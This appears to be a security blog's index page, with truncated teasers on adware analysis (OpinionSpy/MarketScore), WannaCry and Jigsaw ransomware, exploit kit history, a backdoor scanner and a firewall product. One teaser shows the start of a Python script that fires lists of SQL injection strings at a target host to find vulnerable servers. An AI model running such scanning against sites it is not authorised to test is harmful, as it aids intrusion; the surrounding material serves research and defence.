Analysis OSSProxy MarketScore OpinionSpy Adware/PUP/Trojan/Malware comScore vs Nielsen

A few days back one of our Virus/Malware file submission sites received close to a hundred executables from two IP addresses over an hour period for comScore, Inc related samples running AV detection scans against each file. This activity flagged some interest at first because the binary files were for various Operating Systems such as Linux … Read more

What is the Difference between Adware and Malware FIREBALL / Elex – WHAT YOU NEED TO KNOW!

A question I am frequently asked about is what is the difference between adware (legal software that will however overload you with ads and make money) vs. malware (crimeware to be specific). Typically there is a fine line between the two, a good example of a successful adware company is that of OpinionSpy/Marketscore which bundles … Read more

Python Script to scan for vulnerable servers allowing SQL Injection

#!/usr/bin/python import sys, httplib def main(host, path): try: conn = httplib.HTTPConnection(host) conn.request(“GET”, path) r1 = conn.getresponse() print “[+]”,host+path,”:”,r1.status, r1.reason except: print “[-] Error Occurred” pass if len(sys.argv) != 3: print “nUsage: ./ <site> <list of injections>” print “Example: ./ injections.txtn” sys.exit(1) print “n d3hydr8[at]gmail[dot]com sqlResp v1.0” print “———————————————-” try: injects = open(sys.argv[2], “r”).readlines() except(IOError): … Read more

Syhunt Web Backdoor Scanner .LUA or .EXE – Easy Customization and Configuration

So I found this neat little script laying around, it makes looking for backdoors and webshells on webservers a cake walk. Backdoors are always changing and different hacker groups rename common backdoors so you can update this script with new intel in two seconds. To add a new filename to search simple add /newfilename in … Read more

SonicWALL TZ 190 01-SSC-6851 Wireless Security Appliance Firewall

The Dell Sonicwall TZ 190 Series is a high-performance, multi-layered network security platform that integrates Type II PC Card based 3G wireless broadband support, automated failover/failback technologies, a deep packet inspection firewall and optional 802.11 b/g wireless LAN access. The TZ 190 Series enables organizations to establish secure 3G wireless broadband network access instantly without … Read more

Wcry WannaCry WCry Ransomware Malware ETERNALBLUE/MS17-010 Worm is dead or is it? – active new IOCs Domain Names/IPs

Ransomware is nothing new, since 2012 it has been wreaking havoc on the world. The TTPs for delivering and infecting victims has changed over the years but the end goal remains the same, give me your money or you’ll never see your files again. Some of the first ransomware campaigns used mechanisms such as exploit … Read more

JIGSAW Ransomware does not use C2 infrastructure and proving to be a lot harder to shut down then researchers originally thought

A new sample was released today courtesy of which can be located at the reference linked at the bottom. The ransomware is currently being distributed mostly via malspam campaigns but was also observed being served up by the lord exploit  kit and links were found posted on hacked wordpress sites and forums for drive-by-download … Read more

Active Exploit Kits and their Evolution From Blackhole to Fallout and Spelevo Purple Fox Lord

In 2010 the crimeware scene became more profitable then ever and where as the main malware being used to generate revenue was FakeAV and scareware. It wasn’t as easy to infect a host until Paunch hit the scene and developed a way to use publicly available exploits as well as buying 0day exploits on the … Read more